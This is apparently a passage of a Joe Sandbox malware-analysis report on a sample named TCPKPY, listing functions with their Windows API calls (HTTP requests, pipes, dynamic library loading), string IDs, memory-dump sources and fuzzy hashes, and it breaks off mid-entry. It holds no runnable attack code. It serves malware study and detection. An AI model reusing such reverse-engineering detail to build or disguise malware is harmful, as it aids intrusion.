                                                                                                                • Opcode Fuzzy Hash: de0778c4f47cf0ce7107c85fc018cd8a3a01ac2ed8dc3ba5d2ce59979750ecc7
                                                                                                                • Instruction Fuzzy Hash: 3F416B71620205EFDB09CF54C884BAA7BA9EF44350F1480A9EE0DDF245D7B1DDA4CBA0
                                                                                                                Function 00245A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00245A93
                                                                                                                • GetMenuItemInfoW.USER32 ref: 00245AAF
                                                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00245AF5
                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002C18F0,00000000), ref: 00245B3E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                • Opcode ID: 9c0460543df17cdb02d389f697856e3d0c05898170f4e14d43e5741a575aef6e
                                                                                                                • Instruction ID: 208f4dde81e62391e30bfe31f5fa25390c25f9f8bff8e42cb9211379b0103ad7
                                                                                                                • Opcode Fuzzy Hash: 9c0460543df17cdb02d389f697856e3d0c05898170f4e14d43e5741a575aef6e
                                                                                                                • Instruction Fuzzy Hash: 3641C371214712AFDB18DF24D884F1AB7E8EF88718F04461DF8A59B2D2D770E824CB62
                                                                                                                Function 00260458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00260478
                                                                                                                  • Part of subcall function 00207F40: _memmove.LIBCMT ref: 00207F8F
                                                                                                                  • Part of subcall function 0020A2FB: _memmove.LIBCMT ref: 0020A33D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$BuffCharLower
                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                • API String ID: 2411302734-567219261
                                                                                                                • Opcode ID: cf194c3cfb1d62ecc63dc2782b53fdebeaaf725c84c01d71fac6df403ca6e7f9
                                                                                                                • Instruction ID: 3beed0c0adf70adbc38996539c34ac492a31755791f04d5ea0560448177e92bf
                                                                                                                • Opcode Fuzzy Hash: cf194c3cfb1d62ecc63dc2782b53fdebeaaf725c84c01d71fac6df403ca6e7f9
                                                                                                                • Instruction Fuzzy Hash: D331D23452061AAFCF10EF58C980AEFB3B4FF15350B508A29E822972D6CB71E965CF50
                                                                                                                Function 0023C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0023C684
                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0023C697
                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 0023C6C7
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 458670788-1403004172
                                                                                                                • Opcode ID: e7909468edbf40081b45c48ba5b61b203e06960e9a85c8468b17ba9c4a3d506d
                                                                                                                • Instruction ID: a87dbc6ce0ede0d330bba33281de26fa2f5cf41c77f27d91e5123135f2652ab4
                                                                                                                • Opcode Fuzzy Hash: e7909468edbf40081b45c48ba5b61b203e06960e9a85c8468b17ba9c4a3d506d
                                                                                                                • Instruction Fuzzy Hash: C421E1B5920208AADB04AB64D886DFEB76C9B42350F204519F421A31E2DB74592A9F10
                                                                                                                Function 00254A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00254A60
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00254A86
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00254AB6
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00254AFD
                                                                                                                  • Part of subcall function 002556A9: GetLastError.KERNEL32(?,?,00254A2B,00000000,00000000,00000001), ref: 002556BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1951874230-3916222277
                                                                                                                • Opcode ID: f8a8d1eda31cd4c967c6f29ba4b50bda39ed8a49dcdafaa02f6d556c27913573
                                                                                                                • Instruction ID: 3aca42c7f25ec249e16429605f2976f715c31025ca70670128062b73224c0cde
                                                                                                                • Opcode Fuzzy Hash: f8a8d1eda31cd4c967c6f29ba4b50bda39ed8a49dcdafaa02f6d556c27913573
                                                                                                                • Instruction Fuzzy Hash: 9221FFBA550208BFEB11EF64DC94EBFF7ECEB88749F00011AF90592140EA709D599B78
                                                                                                                Function 002038E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0027454E
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • _memset.LIBCMT ref: 00203965
                                                                                                                • _wcscpy.LIBCMT ref: 002039B5
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002039C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 3942752672-1585850449
                                                                                                                • Opcode ID: d53df8f73831077f539e14a22957032f2342247860bba9e17fd190c327da6b42
                                                                                                                • Instruction ID: 3aea058a2aad3ce93d02d0b5b4bde6abc14233fae054877ab54a2b985eaec362
                                                                                                                • Opcode Fuzzy Hash: d53df8f73831077f539e14a22957032f2342247860bba9e17fd190c327da6b42
                                                                                                                • Instruction Fuzzy Hash: D031AF71428345ABD721EB60EC46FDB77ECAF55310F40451AF589821E2DBB0AA78CF92
                                                                                                                Function 00268EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0021C657
                                                                                                                  • Part of subcall function 0021C619: GetStockObject.GDI32(00000011), ref: 0021C66B
                                                                                                                  • Part of subcall function 0021C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021C675
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00268F69
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00268F70
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00268F85
                                                                                                                • DestroyWindow.USER32(?), ref: 00268F8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                • Opcode ID: 504af2c9e63e47833bd2616015187fc9b1b3c0de72fd48a1cac219549d838c4e
                                                                                                                • Instruction ID: 71090b287cdf212b9d5861291a4e3f23c7bcfff1a888ef743e90d75e641e00a0
                                                                                                                • Opcode Fuzzy Hash: 504af2c9e63e47833bd2616015187fc9b1b3c0de72fd48a1cac219549d838c4e
                                                                                                                • Instruction Fuzzy Hash: 4721CD71220206AFEF105E64EC84EBB37AEEB59324F904728FA5493591CB71DCA09B60
                                                                                                                Function 00249E65 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00249E85
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00249EB6
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00249EC8
                                                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00249F02
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: 10a1945f8946f3fed86aa20d7f1442bc2b2c4db98dc0bccec98bc3464b798071
                                                                                                                • Instruction ID: 3152554d424755236ba55ee1a15d13196646a80ef40339518877daadb6716c07
                                                                                                                • Opcode Fuzzy Hash: 10a1945f8946f3fed86aa20d7f1442bc2b2c4db98dc0bccec98bc3464b798071
                                                                                                                • Instruction Fuzzy Hash: AC215174A10306AFDB24DF29DC45A9B7BB8AF85720F204A1AFCA5D72D0D77099A4CB50
                                                                                                                Function 00249F31 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00249F50
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00249F80
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00249F91
                                                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00249FCB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: 5bd7a8658d4a0b1df0e4025dcf0ee7ec26349ab60812d0e0d824909cb2af4a54
                                                                                                                • Instruction ID: 5736522ce4fb3081f9de3ac042aa591500f01e50780ba266baf1b23192e480c5
                                                                                                                • Opcode Fuzzy Hash: 5bd7a8658d4a0b1df0e4025dcf0ee7ec26349ab60812d0e0d824909cb2af4a54
                                                                                                                • Instruction Fuzzy Hash: E421A1756103069BDB249F69DC04A9B77B8AF85720F200A19FCA1D72D0D7709CA9CB50
                                                                                                                Function 0024E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0024E392
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0024E3E6
                                                                                                                • __swprintf.LIBCMT ref: 0024E3FF
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0029DBF0), ref: 0024E43D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                • String ID: %lu
                                                                                                                • API String ID: 3164766367-685833217
                                                                                                                • Opcode ID: e4b22db65c8b847061860cbdd9096eef18ac5078e2a277c31563770ffbe590c2
                                                                                                                • Instruction ID: 99826edbcffceeb63656ce12a76dfcc95149a62443c1bd04853f35fae5cd62d0
                                                                                                                • Opcode Fuzzy Hash: e4b22db65c8b847061860cbdd9096eef18ac5078e2a277c31563770ffbe590c2
                                                                                                                • Instruction Fuzzy Hash: E6217F79A50208AFCB10EFA4DC89DEEB7B8EF49714B104069F509E7292D771DA15CF60
                                                                                                                Function 0023D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                  • Part of subcall function 0023D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0023D640
                                                                                                                  • Part of subcall function 0023D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0023D653
                                                                                                                  • Part of subcall function 0023D623: GetCurrentThreadId.KERNEL32 ref: 0023D65A
                                                                                                                  • Part of subcall function 0023D623: AttachThreadInput.USER32(00000000), ref: 0023D661
                                                                                                                • GetFocus.USER32 ref: 0023D7FB
                                                                                                                  • Part of subcall function 0023D66C: GetParent.USER32(?), ref: 0023D67A
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0023D844
                                                                                                                • EnumChildWindows.USER32(?,0023D8BA), ref: 0023D86C
                                                                                                                • __swprintf.LIBCMT ref: 0023D886
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                • String ID: %s%d
                                                                                                                • API String ID: 1941087503-1110647743
                                                                                                                • Opcode ID: f1d2509eec9799484c86df8f49292d9eb5d027896de45d178f18209a54685ef7
                                                                                                                • Instruction ID: 9fd816290486b9071de703e6f0fe7711381322cc744dedd0f4f3fc3f1df602e4
                                                                                                                • Opcode Fuzzy Hash: f1d2509eec9799484c86df8f49292d9eb5d027896de45d178f18209a54685ef7
                                                                                                                • Instruction Fuzzy Hash: EB11B4B59202096BDF11BFA0FC86FEA376DAB44704F0040B5BE19AA186DBB469558F70
                                                                                                                Function 00228724 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 00228768
                                                                                                                  • Part of subcall function 00228984: __mtinitlocknum.LIBCMT ref: 00228996
                                                                                                                  • Part of subcall function 00228984: EnterCriticalSection.KERNEL32(00220127,?,0022876D,0000000D), ref: 002289AF
                                                                                                                • InterlockedIncrement.KERNEL32(DC840F00), ref: 00228775
                                                                                                                • __lock.LIBCMT ref: 00228789
                                                                                                                • ___addlocaleref.LIBCMT ref: 002287A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                • String ID: P(
                                                                                                                • API String ID: 1687444384-3673270426
                                                                                                                • Opcode ID: efa90797593884bfe62e2effa1a3dc634d8c3ccb65f68b98dd3af888dc6c4ae1
                                                                                                                • Instruction ID: 94f5c06eecfca1dd79d230c7d3caf8e519859e59d6112d6b68ce5642102db4e8
                                                                                                                • Opcode Fuzzy Hash: efa90797593884bfe62e2effa1a3dc634d8c3ccb65f68b98dd3af888dc6c4ae1
                                                                                                                • Instruction Fuzzy Hash: F2016D75426B10EFE720EFA5E809759F7E0BF44325F20890EE599872A0CB74A654CF01
                                                                                                                Function 00261836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002618E4
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00261917
                                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00261A3A
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00261AB0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2364364464-0
                                                                                                                • Opcode ID: b4e45396a8c32a3d2519e285c3917103864768491d3ccfb42ffacbe8eb028e4c
                                                                                                                • Instruction ID: 4026bc8e883a8f6f3e5e8136e04121bb08fe58f9c32d45d2754e7ef7c43bd7a3
                                                                                                                • Opcode Fuzzy Hash: b4e45396a8c32a3d2519e285c3917103864768491d3ccfb42ffacbe8eb028e4c
                                                                                                                • Instruction Fuzzy Hash: 7F818174A60305EBDB149F64C886BAD7BE5AF44720F188059F905AF3C2D7B4ADA4CF90
                                                                                                                Function 0026DE72 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0026DFE5
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0026E01D
                                                                                                                • IsDlgButtonChecked.USER32(?,00000001), ref: 0026E058
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0026E079
                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0026E091
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188977179-0
                                                                                                                • Opcode ID: 7a7535dc25bac8394a8a3d27f9790657c11e95d11fd70548cc41ed52c6db9fbe
                                                                                                                • Instruction ID: 008d9ac895dc49c076c02ed3836f23413bb98d563a5b6f756d50861d8990bfe4
                                                                                                                • Opcode Fuzzy Hash: 7a7535dc25bac8394a8a3d27f9790657c11e95d11fd70548cc41ed52c6db9fbe
                                                                                                                • Instruction Fuzzy Hash: FB61E275F24209AFEB20CF54C895FEA77F6AF4A300F104599F45A973A2C771A9A0CB50
                                                                                                                Function 00260579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002605DF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0026066E
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0026068C
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 002606D2
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 002606EC
                                                                                                                  • Part of subcall function 0021F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0024AEA5,?,?,00000000,00000008), ref: 0021F282
                                                                                                                  • Part of subcall function 0021F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0024AEA5,?,?,00000000,00000008), ref: 0021F2A6
                                                                                                                Memory Dump Source
